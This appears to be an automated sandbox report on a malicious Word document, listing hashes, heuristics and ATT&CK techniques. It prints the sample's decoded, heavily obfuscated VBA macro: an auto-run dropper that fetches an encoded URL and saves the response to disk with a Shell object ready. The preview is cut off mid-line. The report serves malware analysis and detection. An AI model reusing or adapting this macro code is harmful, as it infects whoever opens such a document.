Office (OLE) malware analysis — malicious · d28372bb6e302a9c

MALICIOUS

Office (OLE)

128.0 KB Created: 2020-04-19 04:19:00 Authoring application: Microsoft Office Word First seen: 2020-09-07

MD5: 32c32c919bc5f06d27741d0973b17a2d SHA-1: 94301f56793f5f7a3dc420a39630f34161ecffb2 SHA-256: d28372bb6e302a9c0c14a8ab03e6e528c49717e5a7ab21bc722ff6a25c4c1a43

172 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1105 Ingress Tool Transfer

The sample is a Microsoft Office document containing VBA macros. The critical heuristic 'OLE_VBA_HTTP_DROP_EXEC' indicates that the VBA code downloads a file from an HTTP URL and saves it to disk, which is then likely executed. The 'Document_Open' macro and 'CreateObject' calls further suggest malicious execution upon opening the document. The embedded URL, though marked as benign, is referenced by the macro, indicating its potential use in the download process.

Heuristics 7

VBA macros detected medium 4 related findings OLE_VBA_MACROS

Document contains VBA macro code

VBA downloads and writes a file to disk critical OLE_VBA_HTTP_DROP_EXEC

VBA reads an HTTP response body and writes it to disk (ADODB.Stream SaveToFile). Combined with the auto-exec/Shell paths this is a download-drop dropper even when the COM ProgIDs are built dynamically to evade keyword scanning.

Matched line in script

PQBPRXWNUHHUYFTDSFOBOTQZRDUZDBHPWBBGRPEFVYIMHWUUTVOSVERQYTVRESHGXRCWSZFVVPPDHNCLBNWCWURBZLDILJPXXJJOZQFNEHQUPFDDCEWTWMZSZCEZMBPIGZKFBINEEXQFPVDTDVXKFDZJITEQTRXYGRRWCYNVFOYVQGKLKMFC = QOZLXBYEGNXYDIGUCLVFDXNRRRTMIMBIHPRSOBIFWOPZNPWCMTNGTFESJRKMZMSPYWITGCZGOVGZFQODETEHLFVZZYCNQUJQPXZBWJQNFVXHVXFDUCOOCGMBKZMUIUBXHYKCHKINWEHINYWLMCFPSNEBCBDVYDLXXGBCXKYONEYJEZGLDD.responseBody

CreateObject call high OLE_VBA_CREATEOBJ

CreateObject call
Matched line in script
```
Dim fso: Set fso = CreateObject("Scripting.FileSystemObject")
```
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Document_Open macro low OLE_VBA_DOCOPEN

Document_Open macro
Matched line in script
```
Private Sub Document_Open()
```
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE

One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main Referenced by macro

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	15708 bytes
SHA-256: `605eb1b86098deb0192ff6c4f977da30a5b4025f8059686f0d87bca3568f2edd`
Detection ClamAV: No threats found Obfuscation or payload: likely Carved artifact contains 75 long base64-like blob(s).
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Public Function CleanEncryptSTR(QUPFDDCEWTWMZSZCEZMBPIGZKFBINEEXQFPVDTDVXKFDZJITEQTRXYGRRWCYNVFOYVQGKLKMFCFUBBIKMIUCXQHISHJQUGMGYMXXLCLEGSGLIRQCMYUSYHOYTXJHVWNWZEYOSTSUGKNDJJQSTPCKGYPQBPRXWNUHHUYFTDSFOBOTQZRDUZDBHPWBBGRPEFVY As String) As String Dim YZQTDHCRPPOQJMQYMLTOQMYNCBSMWRNUZQQKKXCIWGVIQWRPMVUGXDGEKSSEEJULZIXBLPKZWXWYRORHUNUWYUHUKDBUFZVDHYYSLYKQXOXQSFYXUEDOYLOMSTBMMRVTIQZJTQLBFGFHZWZPVVDFGCOWSLCDNCEKPZHBTHSRGWFYBN As String YZQTDHCRPPOQJMQYMLTOQMYNCBSMWRNUZQQKKXCIWGVIQWRPMVUGXDGEKSSEEJULZIXBLPKZWXWYRORHUNUWYUHUKDBUFZVDHYYSLYKQXOXQSFYXUEDOYLOMSTBMMRVTIQZJTQLBFGFHZWZPVVDFGCOWSLCDNCEKPZHBTHSRGWFYBN = "&0123456789;ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz" Dim IMHWUUTVOSVERQYTVRESHGXRCWSZFVVPPDHNCLBNWCWURBZLDILJPXXJJOZQFNEHQUPFDDCEWTWMZSZCEZMBPIGZKFBINEEXQFPVDTDVXKFDZJITEQTRXYGRRWCYNVFOYVQGKLKMFCFUBBIKMIUCXQHISHJQUGMGYMXXLCLEGSGLIRQCMYUSYH As String Dim OYTXJHVWNWZEYOSTSUGKNDJJQSTPCKGYPQBPRXWNUHHUYFTDSFOBOTQZRDUZDVCKRVVBMKYZQTDHCRPPOQJMQYMLTOQMYNCBSMWRNUZQQKKXCIWGVIQWRPMVUGXDGEKSSEEJULZIXBLPKZWXWYRORHUNUWYUHUKDBUFZVDHYYSLYKQXOXQS As Boolean IMHWUUTVOSVERQYTVRESHGXRCWSZFVVPPDHNCLBNWCWURBZLDILJPXXJJOZQFNEHQUPFDDCEWTWMZSZCEZMBPIGZKFBINEEXQFPVDTDVXKFDZJITEQTRXYGRRWCYNVFOYVQGKLKMFCFUBBIKMIUCXQHISHJQUGMGYMXXLCLEGSGLIRQCMYUSYH = "DFHSGFJHSHFBDFBDFGSDRBRHBESRBERGSERHRHESDRGRFDBSDRGEARGHERGHESRHERGESRGESRHEHRFGBHSRGHESDRHERHBDRFGBHSDFGESRGHEWSRGHSGBESRGHESRHAREGERGASGHESRHESRHESRHERGESRGSERGASGEARGAREGHEHEAHRSE" OYTXJHVWNWZEYOSTSUGKNDJJQSTPCKGYPQBPRXWNUHHUYFTDSFOBOTQZRDUZDVCKRVVBMKYZQTDHCRPPOQJMQYMLTOQMYNCBSMWRNUZQQKKXCIWGVIQWRPMVUGXDGEKSSEEJULZIXBLPKZWXWYRORHUNUWYUHUKDBUFZVDHYYSLYKQXOXQS = False Dim i As Integer Dim FYXUEDOYLOMSTBMMRVTIQZJTQLBFGFHZWZPVVDFGCOWSLCDNCEKPZHBTHSRGWFYBNBGDMLWHTPNTCJTNSECQRIRUYTJNONPBFIXEDLNOKWFBSKLVJMSRIPCCPTZOXNZJVJOLUMXPUXVCKRVVBMKYZQTDHCRPPOQJMQYMLTOQMYNCBSMWR As Integer Dim NUZQQKKXCIWGVIQWRPMVUGXDGEKSSEEJULZIXBLPKZWXWYRORHUNUWYUHUKDBUFZVDHYYSLYKQXOXQSFYXUEDOYLOMSTBMMRVTIQZJTQLBFGFHZWZPVVDFGCOWSLCDNCEKPZHBTHSRGWFYBNBGDMLWHTPNTCJTNSECQRIRUYTJNONPBFIXEDLNOKWFBSKLVJM As String Dim SRIPCCPTZOXNZJVJOLUMXPUXVCKRVVBMKYZQTDHCRPPOQJMQYMLTOQMYNCBSMWRNUZQQKKXCIWGVIQWRPMVUGXDGEKSSEEJULZIXBLPKZWXWYRORHUNUWYUHUKDBUFZVDHYYSLYKQXOXQSFYXUEDOYLOMSTBMMRVTIQZJTQLBFGFHZWZPVVDFGCOWS As Integer Dim LCDNCEKPZHBTHSRGWFYBNBGDMLWHTPNTCJTNSECQRIRUYTJNONPBFIXEDLNOKWFBSKLVJMSRIPCCPTZOXNZJVJOLUMXPUXVCKRVVBMKYZQTDHCRPPOQJMQYMLTOQMYNCBSMWRNUZQQKKXCIWGVIQWRPMVUGXDGEKSSEEJULZIXBLPKZW As Integer Dim XWYRORHUNUWYUHUKDBUFZVDHYYSLYKQXOXQSFYXUEDOYLOMSTBMMRVTIQZJTQLBFGFHZWZPVVDFGCOWSLCDNCEKPZHBTHSRGWFYBNBGDMLWHTPNTCJTNSECQRIRUYTJNONPBFIXEDLNOKWFBSKLVJMSRIPCCPTZOXNZJVJOLUMXPUXVCKRVVBMK As String If Len(IMHWUUTVOSVERQYTVRESHGXRCWSZFVVPPDHNCLBNWCWURBZLDILJPXXJJOZQFNEHQUPFDDCEWTWMZSZCEZMBPIGZKFBINEEXQFPVDTDVXKFDZJITEQTRXYGRRWCYNVFOYVQGKLKMFCFUBBIKMIUCXQHISHJQUGMGYMXXLCLEGSGLIRQCMYUSYH) > 0 Then For i = 1 To Len(QUPFDDCEWTWMZSZCEZMBPIGZKFBINEEXQFPVDTDVXKFDZJITEQTRXYGRRWCYNVFOYVQGKLKMFCFUBBIKMIUCXQHISHJQUGMGYMXXLCLEGSGLIRQCMYUSYHOYTXJHVWNWZEYOSTSUGKNDJJQSTPCKGYPQBPRXWNUHHUYFTDSFOBOTQZRDUZDBHPWBBGRPEFVY) NUZQQKKXCIWGVIQWRPMVUGXDGEKSSEEJULZIXBLPKZWXWYRORHUNUWYUHUKDBUFZVDHYYSLYKQXOXQSFYXUEDOYLOMSTBMMRVTIQZJTQLBFGFHZWZPVVDFGCOWSLCDNCEKPZHBTHSRGWFYBNBGDMLWHTPNTCJTNSECQRIRUYTJNONPBFIXEDLNOKWFBSKLVJM = Mid(QUPFDDCEWTWMZSZCEZMBPIGZKFBINEEXQFPVDTDVXKFDZJITEQTRXYGRRWCYNVFOYVQGKLKMFCFUBBIKMIUCXQHISHJQUGMGYMXXLCLEGSGLIRQCMYUSYHOYTXJHVWNWZEYOSTSUGKNDJJQSTPCKGYPQBPRXWNUHHUYFTDSFOBOTQZRDUZDBHPWBBGRPEFVY, i, 1) SRIPCCPTZOXNZJVJOLUMXPUXVCKRVVBMKYZQTDHCRPPOQJMQYMLTOQMYNCBSMWRNUZQQKKXCIWGVIQWRPMVUGXDGEKSSEEJULZIXBLPKZWXWYRORHUNUWYUHUKDBUFZVDHYYSLYKQXOXQSFYXUEDOYLOMSTBMMRVTIQZJTQLBFGFHZWZPVVDFGCOWS = InStr(YZQTDHCRPPOQJMQYMLTOQMYNCBSMWRNUZQQKKXCIWGVIQWRPMVUGXDGEKSSEEJULZIXBLPKZWXWYRORHUNUWYUHUKDBUFZVDHYYSLYKQXOXQSFYXUEDOYLOMSTBMMRVTIQZJTQLBFGFHZWZPVVDFGCOWSLCDNCEKPZHBTHSRGWFYBN, NUZQQKKXCIWGVIQWRPMVUGXDGEKSSEEJULZIXBLPKZWXWYRORHUNUWYUHUKDBUFZVDHYYSLYKQXOXQSFYXUEDOYLOMSTBMMRVTIQZJTQLBFGFHZWZPVVDFGCOWSLCDNCEKPZHBTHSRGWFYBNBGDMLWHTPNTCJTNSECQRIRUYTJNONPBFIXEDLNOKWFBSKLVJM) If SRIPCCPTZOXNZJVJOLUMXPUXVCKRVVBMKYZQTDHCRPPOQJMQYMLTOQMYNCBSMWRNUZQQKKXCIWGVIQWRPMVUGXDGEKSSEEJULZIXBLPKZWXWYRORHUNUWYUHUKDBUFZVDHYYSLYKQXOXQSFYXUEDOYLOMSTBMMRVTIQZJTQLBFGFHZWZPVVDFGCOWS > 0 Then FYXUEDOYLOMSTBMMRVTIQZJTQLBFGFHZWZPVVDFGCOWSLCDNCEKPZHBTHSRGWFYBNBGDMLWHTPNTCJTNSECQRIRUYTJNONPBFIXEDLNOKWFBSKLVJMSRIPCCPTZOXNZJVJOLUMXPUXVCKRVVBMKYZQTDHCRPPOQJMQYMLTOQMYNCBSMWR = Asc(Mid(IMHWUUTVOSVERQYTVRESHGXRCWSZFVVPPDHNCLBNWCWURBZLDILJPXXJJOZQFNEHQUPFDDCEWTWMZSZCEZMBPIGZKFBINEEXQFPVDTDVXKFDZJITEQTRXYGRRWCYNVFOYVQGKLKMFCFUBBIKMIUCXQHISHJQUGMGYMXXLCLEGSGLIRQCMYUSYH, i Mod Len(IMHWUUTVOSVERQYTVRESHGXRCWSZFVVPPDHNCLBNWCWURBZLDILJPXXJJOZQFNEHQUPFDDCEWTWMZSZCEZMBPIGZKFBINEEXQFPVDTDVXKFDZJITEQTRXYGRRWCYNVFOYVQGKLKMFCFUBBIKMIUCXQHISHJQUGMGYMXXLCLEGSGLIRQCMYUSYH) + 1, 1)) If OYTXJHVWNWZEYOSTSUGKNDJJQSTPCKGYPQBPRXWNUHHUYFTDSFOBOTQZRDUZDVCKRVVBMKYZQTDHCRPPOQJMQYMLTOQMYNCBSMWRNUZQQKKXCIWGVIQWRPMVUGXDGEKSSEEJULZIXBLPKZWXWYRORHUNUWYUHUKDBUFZVDHYYSLYKQXOXQS Then LCDNCEKPZHBTHSRGWFYBNBGDMLWHTPNTCJTNSECQRIRUYTJNONPBFIXEDLNOKWFBSKLVJMSRIPCCPTZOXNZJVJOLUMXPUXVCKRVVBMKYZQTDHCRPPOQJMQYMLTOQMYNCBSMWRNUZQQKKXCIWGVIQWRPMVUGXDGEKSSEEJULZIXBLPKZW = SRIPCCPTZOXNZJVJOLUMXPUXVCKRVVBMKYZQTDHCRPPOQJMQYMLTOQMYNCBSMWRNUZQQKKXCIWGVIQWRPMVUGXDGEKSSEEJULZIXBLPKZWXWYRORHUNUWYUHUKDBUFZVDHYYSLYKQXOXQSFYXUEDOYLOMSTBMMRVTIQZJTQLBFGFHZWZPVVDFGCOWS + FYXUEDOYLOMSTBMMRVTIQZJTQLBFGFHZWZPVVDFGCOWSLCDNCEKPZHBTHSRGWFYBNBGDMLWHTPNTCJTNSECQRIRUYTJNONPBFIXEDLNOKWFBSKLVJMSRIPCCPTZOXNZJVJOLUMXPUXVCKRVVBMKYZQTDHCRPPOQJMQYMLTOQMYNCBSMWR Else LCDNCEKPZHBTHSRGWFYBNBGDMLWHTPNTCJTNSECQRIRUYTJNONPBFIXEDLNOKWFBSKLVJMSRIPCCPTZOXNZJVJOLUMXPUXVCKRVVBMKYZQTDHCRPPOQJMQYMLTOQMYNCBSMWRNUZQQKKXCIWGVIQWRPMVUGXDGEKSSEEJULZIXBLPKZW = SRIPCCPTZOXNZJVJOLUMXPUXVCKRVVBMKYZQTDHCRPPOQJMQYMLTOQMYNCBSMWRNUZQQKKXCIWGVIQWRPMVUGXDGEKSSEEJULZIXBLPKZWXWYRORHUNUWYUHUKDBUFZVDHYYSLYKQXOXQSFYXUEDOYLOMSTBMMRVTIQZJTQLBFGFHZWZPVVDFGCOWS - FYXUEDOYLOMSTBMMRVTIQZJTQLBFGFHZWZPVVDFGCOWSLCDNCEKPZHBTHSRGWFYBNBGDMLWHTPNTCJTNSECQRIRUYTJNONPBFIXEDLNOKWFBSKLVJMSRIPCCPTZOXNZJVJOLUMXPUXVCKRVVBMKYZQTDHCRPPOQJMQYMLTOQMYNCBSMWR End If LCDNCEKPZHBTHSRGWFYBNBGDMLWHTPNTCJTNSECQRIRUYTJNONPBFIXEDLNOKWFBSKLVJMSRIPCCPTZOXNZJVJOLUMXPUXVCKRVVBMKYZQTDHCRPPOQJMQYMLTOQMYNCBSMWRNUZQQKKXCIWGVIQWRPMVUGXDGEKSSEEJULZIXBLPKZW = LCDNCEKPZHBTHSRGWFYBNBGDMLWHTPNTCJTNSECQRIRUYTJNONPBFIXEDLNOKWFBSKLVJMSRIPCCPTZOXNZJVJOLUMXPUXVCKRVVBMKYZQTDHCRPPOQJMQYMLTOQMYNCBSMWRNUZQQKKXCIWGVIQWRPMVUGXDGEKSSEEJULZIXBLPKZW Mod Len(YZQTDHCRPPOQJMQYMLTOQMYNCBSMWRNUZQQKKXCIWGVIQWRPMVUGXDGEKSSEEJULZIXBLPKZWXWYRORHUNUWYUHUKDBUFZVDHYYSLYKQXOXQSFYXUEDOYLOMSTBMMRVTIQZJTQLBFGFHZWZPVVDFGCOWSLCDNCEKPZHBTHSRGWFYBN) If LCDNCEKPZHBTHSRGWFYBNBGDMLWHTPNTCJTNSECQRIRUYTJNONPBFIXEDLNOKWFBSKLVJMSRIPCCPTZOXNZJVJOLUMXPUXVCKRVVBMKYZQTDHCRPPOQJMQYMLTOQMYNCBSMWRNUZQQKKXCIWGVIQWRPMVUGXDGEKSSEEJULZIXBLPKZW <= 0 Then LCDNCEKPZHBTHSRGWFYBNBGDMLWHTPNTCJTNSECQRIRUYTJNONPBFIXEDLNOKWFBSKLVJMSRIPCCPTZOXNZJVJOLUMXPUXVCKRVVBMKYZQTDHCRPPOQJMQYMLTOQMYNCBSMWRNUZQQKKXCIWGVIQWRPMVUGXDGEKSSEEJULZIXBLPKZW = LCDNCEKPZHBTHSRGWFYBNBGDMLWHTPNTCJTNSECQRIRUYTJNONPBFIXEDLNOKWFBSKLVJMSRIPCCPTZOXNZJVJOLUMXPUXVCKRVVBMKYZQTDHCRPPOQJMQYMLTOQMYNCBSMWRNUZQQKKXCIWGVIQWRPMVUGXDGEKSSEEJULZIXBLPKZW + Len(YZQTDHCRPPOQJMQYMLTOQMYNCBSMWRNUZQQKKXCIWGVIQWRPMVUGXDGEKSSEEJULZIXBLPKZWXWYRORHUNUWYUHUKDBUFZVDHYYSLYKQXOXQSFYXUEDOYLOMSTBMMRVTIQZJTQLBFGFHZWZPVVDFGCOWSLCDNCEKPZHBTHSRGWFYBN) End If XWYRORHUNUWYUHUKDBUFZVDHYYSLYKQXOXQSFYXUEDOYLOMSTBMMRVTIQZJTQLBFGFHZWZPVVDFGCOWSLCDNCEKPZHBTHSRGWFYBNBGDMLWHTPNTCJTNSECQRIRUYTJNONPBFIXEDLNOKWFBSKLVJMSRIPCCPTZOXNZJVJOLUMXPUXVCKRVVBMK = XWYRORHUNUWYUHUKDBUFZVDHYYSLYKQXOXQSFYXUEDOYLOMSTBMMRVTIQZJTQLBFGFHZWZPVVDFGCOWSLCDNCEKPZHBTHSRGWFYBNBGDMLWHTPNTCJTNSECQRIRUYTJNONPBFIXEDLNOKWFBSKLVJMSRIPCCPTZOXNZJVJOLUMXPUXVCKRVVBMK & Mid(YZQTDHCRPPOQJMQYMLTOQMYNCBSMWRNUZQQKKXCIWGVIQWRPMVUGXDGEKSSEEJULZIXBLPKZWXWYRORHUNUWYUHUKDBUFZVDHYYSLYKQXOXQSFYXUEDOYLOMSTBMMRVTIQZJTQLBFGFHZWZPVVDFGCOWSLCDNCEKPZHBTHSRGWFYBN, LCDNCEKPZHBTHSRGWFYBNBGDMLWHTPNTCJTNSECQRIRUYTJNONPBFIXEDLNOKWFBSKLVJMSRIPCCPTZOXNZJVJOLUMXPUXVCKRVVBMKYZQTDHCRPPOQJMQYMLTOQMYNCBSMWRNUZQQKKXCIWGVIQWRPMVUGXDGEKSSEEJULZIXBLPKZW, 1) Else XWYRORHUNUWYUHUKDBUFZVDHYYSLYKQXOXQSFYXUEDOYLOMSTBMMRVTIQZJTQLBFGFHZWZPVVDFGCOWSLCDNCEKPZHBTHSRGWFYBNBGDMLWHTPNTCJTNSECQRIRUYTJNONPBFIXEDLNOKWFBSKLVJMSRIPCCPTZOXNZJVJOLUMXPUXVCKRVVBMK = XWYRORHUNUWYUHUKDBUFZVDHYYSLYKQXOXQSFYXUEDOYLOMSTBMMRVTIQZJTQLBFGFHZWZPVVDFGCOWSLCDNCEKPZHBTHSRGWFYBNBGDMLWHTPNTCJTNSECQRIRUYTJNONPBFIXEDLNOKWFBSKLVJMSRIPCCPTZOXNZJVJOLUMXPUXVCKRVVBMK & NUZQQKKXCIWGVIQWRPMVUGXDGEKSSEEJULZIXBLPKZWXWYRORHUNUWYUHUKDBUFZVDHYYSLYKQXOXQSFYXUEDOYLOMSTBMMRVTIQZJTQLBFGFHZWZPVVDFGCOWSLCDNCEKPZHBTHSRGWFYBNBGDMLWHTPNTCJTNSECQRIRUYTJNONPBFIXEDLNOKWFBSKLVJM End If Next i Else XWYRORHUNUWYUHUKDBUFZVDHYYSLYKQXOXQSFYXUEDOYLOMSTBMMRVTIQZJTQLBFGFHZWZPVVDFGCOWSLCDNCEKPZHBTHSRGWFYBNBGDMLWHTPNTCJTNSECQRIRUYTJNONPBFIXEDLNOKWFBSKLVJMSRIPCCPTZOXNZJVJOLUMXPUXVCKRVVBMK = QUPFDDCEWTWMZSZCEZMBPIGZKFBINEEXQFPVDTDVXKFDZJITEQTRXYGRRWCYNVFOYVQGKLKMFCFUBBIKMIUCXQHISHJQUGMGYMXXLCLEGSGLIRQCMYUSYHOYTXJHVWNWZEYOSTSUGKNDJJQSTPCKGYPQBPRXWNUHHUYFTDSFOBOTQZRDUZDBHPWBBGRPEFVY End If CleanEncryptSTR = XWYRORHUNUWYUHUKDBUFZVDHYYSLYKQXOXQSFYXUEDOYLOMSTBMMRVTIQZJTQLBFGFHZWZPVVDFGCOWSLCDNCEKPZHBTHSRGWFYBNBGDMLWHTPNTCJTNSECQRIRUYTJNONPBFIXEDLNOKWFBSKLVJMSRIPCCPTZOXNZJVJOLUMXPUXVCKRVVBMK End Function Private Sub Document_Open() Const QUPFDDCEWTWMZSZCEZMBPIGZKFBINEEXQFPVDTDVXKFDZJITEQTRXYGRRWCYNVFOYVQGKLKMFCFUBBIKMIUCXQHISHJQUGMGYMXXLCLEGSGLIRQCMYUSYHOYTXJHVWNWZEYOSTSUGKNDJJQSTPCKGYPQBPRXWNUHHUYFTDSFOBOTQZRDUZDBHPWBBGRPEFVY = 2 Dim fso: Set fso = CreateObject("Scripting.FileSystemObject") UBBIKMIUCXQHISHJQUGMGYMXXLCLEGSGLIRQCMYUSYHOYTXJHVWNWZEYOSTSUGKNDJJQSTPCKGYPQBPRXWNUHHUYFTDSFOBOTQZRDUZDBHPWBBGRPEFVYIMHWUUTVOSVERQYTVRESHGXRCWSZFVVPPDHNCLBNWCWURBZLDILJPXXJJOZQFNEH = fso.GetSpecialFolder(QUPFDDCEWTWMZSZCEZMBPIGZKFBINEEXQFPVDTDVXKFDZJITEQTRXYGRRWCYNVFOYVQGKLKMFCFUBBIKMIUCXQHISHJQUGMGYMXXLCLEGSGLIRQCMYUSYHOYTXJHVWNWZEYOSTSUGKNDJJQSTPCKGYPQBPRXWNUHHUYFTDSFOBOTQZRDUZDBHPWBBGRPEFVY) Dim QUPFDDCEWTWMZSZCEZMBPIGZKFBINEEXQFPVDTDVXKFDZJITEQTRXYGRRWCYNVFOYVQGKLKMFCFUBBIKMIUCXQHISHJQUGMGYMXXLCLEGSGLIRQCMYUSYHOYTXJHVWNWZEYOSTSUGKNDJJQSTPCKGYPQBPRXWNUHHUYFTDSFOBOTQZRDUZDBHPW Set QUPFDDCEWTWMZSZCEZMBPIGZKFBINEEXQFPVDTDVXKFDZJITEQTRXYGRRWCYNVFOYVQGKLKMFCFUBBIKMIUCXQHISHJQUGMGYMXXLCLEGSGLIRQCMYUSYHOYTXJHVWNWZEYOSTSUGKNDJJQSTPCKGYPQBPRXWNUHHUYFTDSFOBOTQZRDUZDBHPW = CreateObject("ADODB.STREAM") YEPGUDSVGKEURSRTMJMCPIPRSOBPFXUPZUQWCTTNGTFLSJRLNZTSPYXJTGJHMOVGHMQODLUEOLGVZBZCURUKQQXZBWJRNFWXIVYFKUCVOCNMBRZTVIVBXHGQCOKIOWEOINYWLMDMPTOEIIIKVYDSYXGIJFRZVNFGQEHNMDKWWKOUJSIUDQEJGPHSKPSQWFM = UBBIKMIUCXQHISHJQUGMGYMXXLCLEGSGLIRQCMYUSYHOYTXJHVWNWZEYOSTSUGKNDJJQSTPCKGYPQBPRXWNUHHUYFTDSFOBOTQZRDUZDBHPWBBGRPEFVYIMHWUUTVOSVERQYTVRESHGXRCWSZFVVPPDHNCLBNWCWURBZLDILJPXXJJOZQFNEH + CleanEncryptSTR("\YseXSUfTU.i2g") Set CXCQXWFHIEQXUMDFODFMRCJCVJUTIYHZCPCIFOMXJURPUELVPUGDSTJTVZUKPPORDGKYFFNPQMYGDULMWLNUSKQEERVCPZPCKXKQNWNYRWZXDLTWXCOLBBRUEIDSQQQSLORZNNVQRNZOEDTOYTOVBSSMMZEKXIXJSYSROXVHYFHGLTUFGKWNCJZDMQLBYY = CreateObject("SHELL.APPLICATION") Set QOZLXBYEGNXYDIGUCLVFDXNRRRTMIMBIHPRSOBIFWOPZNPWCMTNGTFESJRKMZMSPYWITGCZGOVGZFQODETEHLFVZZYCNQUJQPXZBWJQNFVXHVXFDUCOOCGMBKZMUIUBXHYKCHKINWEHINYWLMCFPSNEBCBDVYDLXXGBCXKYONEYJEZGLDD = CreateObject("MICROSOFT.XMLHTTP") QOZLXBYEGNXYDIGUCLVFDXNRRRTMIMBIHPRSOBIFWOPZNPWCMTNGTFESJRKMZMSPYWITGCZGOVGZFQODETEHLFVZZYCNQUJQPXZBWJQNFVXHVXFDUCOOCGMBKZMUIUBXHYKCHKINWEHINYWLMCFPSNEBCBDVYDLXXGBCXKYONEYJEZGLDD.Open "get", CleanEncryptSTR("n0Awy://31y.&rpuhw.wg/lq052qfv/J7IAP95Q/thsCBgMeui6bIDjfxhnD/xqqw.jEw"), False DVXKFDZJITEQTRXYGRRWCYNVFOYVQGKLKMFCFUBBIKMIUCXQHISHJQUGMGYMXXLCLEGSGLIRQCMYUSYHOYTXJHVWNWZEYOSTSUGKNDJJQSTPCKGYPQBPRXWNUHHUYFTDSFOBOTQZRDUZDBHPWBBGRPEFVYIMHWUUTVOSVERQYTVRESHGXRCWSZFVVPPDHNCL = 1 QOZLXBYEGNXYDIGUCLVFDXNRRRTMIMBIHPRSOBIFWOPZNPWCMTNGTFESJRKMZMSPYWITGCZGOVGZFQODETEHLFVZZYCNQUJQPXZBWJQNFVXHVXFDUCOOCGMBKZMUIUBXHYKCHKINWEHINYWLMCFPSNEBCBDVYDLXXGBCXKYONEYJEZGLDD.send PQBPRXWNUHHUYFTDSFOBOTQZRDUZDBHPWBBGRPEFVYIMHWUUTVOSVERQYTVRESHGXRCWSZFVVPPDHNCLBNWCWURBZLDILJPXXJJOZQFNEHQUPFDDCEWTWMZSZCEZMBPIGZKFBINEEXQFPVDTDVXKFDZJITEQTRXYGRRWCYNVFOYVQGKLKMFC = QOZLXBYEGNXYDIGUCLVFDXNRRRTMIMBIHPRSOBIFWOPZNPWCMTNGTFESJRKMZMSPYWITGCZGOVGZFQODETEHLFVZZYCNQUJQPXZBWJQNFVXHVXFDUCOOCGMBKZMUIUBXHYKCHKINWEHINYWLMCFPSNEBCBDVYDLXXGBCXKYONEYJEZGLDD.responseBody If QOZLXBYEGNXYDIGUCLVFDXNRRRTMIMBIHPRSOBIFWOPZNPWCMTNGTFESJRKMZMSPYWITGCZGOVGZFQODETEHLFVZZYCNQUJQPXZBWJQNFVXHVXFDUCOOCGMBKZMUIUBXHYKCHKINWEHINYWLMCFPSNEBCBDVYDLXXGBCXKYONEYJEZGLDD.Status = 200 Then QUPFDDCEWTWMZSZCEZMBPIGZKFBINEEXQFPVDTDVXKFDZJITEQTRXYGRRWCYNVFOYVQGKLKMFCFUBBIKMIUCXQHISHJQUGMGYMXXLCLEGSGLIRQCMYUSYHOYTXJHVWNWZEYOSTSUGKNDJJQSTPCKGYPQBPRXWNUHHUYFTDSFOBOTQZRDUZDBHPW.Open QUPFDDCEWTWMZSZCEZMBPIGZKFBINEEXQFPVDTDVXKFDZJITEQTRXYGRRWCYNVFOYVQGKLKMFCFUBBIKMIUCXQHISHJQUGMGYMXXLCLEGSGLIRQCMYUSYHOYTXJHVWNWZEYOSTSUGKNDJJQSTPCKGYPQBPRXWNUHHUYFTDSFOBOTQZRDUZDBHPW.Type = DVXKFDZJITEQTRXYGRRWCYNVFOYVQGKLKMFCFUBBIKMIUCXQHISHJQUGMGYMXXLCLEGSGLIRQCMYUSYHOYTXJHVWNWZEYOSTSUGKNDJJQSTPCKGYPQBPRXWNUHHUYFTDSFOBOTQZRDUZDBHPWBBGRPEFVYIMHWUUTVOSVERQYTVRESHGXRCWSZFVVPPDHNCL QUPFDDCEWTWMZSZCEZMBPIGZKFBINEEXQFPVDTDVXKFDZJITEQTRXYGRRWCYNVFOYVQGKLKMFCFUBBIKMIUCXQHISHJQUGMGYMXXLCLEGSGLIRQCMYUSYHOYTXJHVWNWZEYOSTSUGKNDJJQSTPCKGYPQBPRXWNUHHUYFTDSFOBOTQZRDUZDBHPW.Write PQBPRXWNUHHUYFTDSFOBOTQZRDUZDBHPWBBGRPEFVYIMHWUUTVOSVERQYTVRESHGXRCWSZFVVPPDHNCLBNWCWURBZLDILJPXXJJOZQFNEHQUPFDDCEWTWMZSZCEZMBPIGZKFBINEEXQFPVDTDVXKFDZJITEQTRXYGRRWCYNVFOYVQGKLKMFC QUPFDDCEWTWMZSZCEZMBPIGZKFBINEEXQFPVDTDVXKFDZJITEQTRXYGRRWCYNVFOYVQGKLKMFCFUBBIKMIUCXQHISHJQUGMGYMXXLCLEGSGLIRQCMYUSYHOYTXJHVWNWZEYOSTSUGKNDJJQSTPCKGYPQBPRXWNUHHUYFTDSFOBOTQZRDUZDBHPW.SaveToFile YEPGUDSVGKEURSRTMJMCPIPRSOBPFXUPZUQWCTTNGTFLSJRLNZTSPYXJTGJHMOVGHMQODLUEOLGVZBZCURUKQQXZBWJRNFWXIVYFKUCVOCNMBRZTVIVBXHGQCOKIOWEOINYWLMDMPTOEIIIKVYDSYXGIJFRZVNFGQEHNMDKWWKOUJSIUDQEJGPHSKPSQWFM, DVXKFDZJITEQTRXYGRRWCYNVFOYVQGKLKMFCFUBBIKMIUCXQHISHJQUGMGYMXXLCLEGSGLIRQCMYUSYHOYTXJHVWNWZEYOSTSUGKNDJJQSTPCKGYPQBPRXWNUHHUYFTDSFOBOTQZRDUZDBHPWBBGRPEFVYIMHWUUTVOSVERQYTVRESHGXRCWSZFVVPPDHNCL + 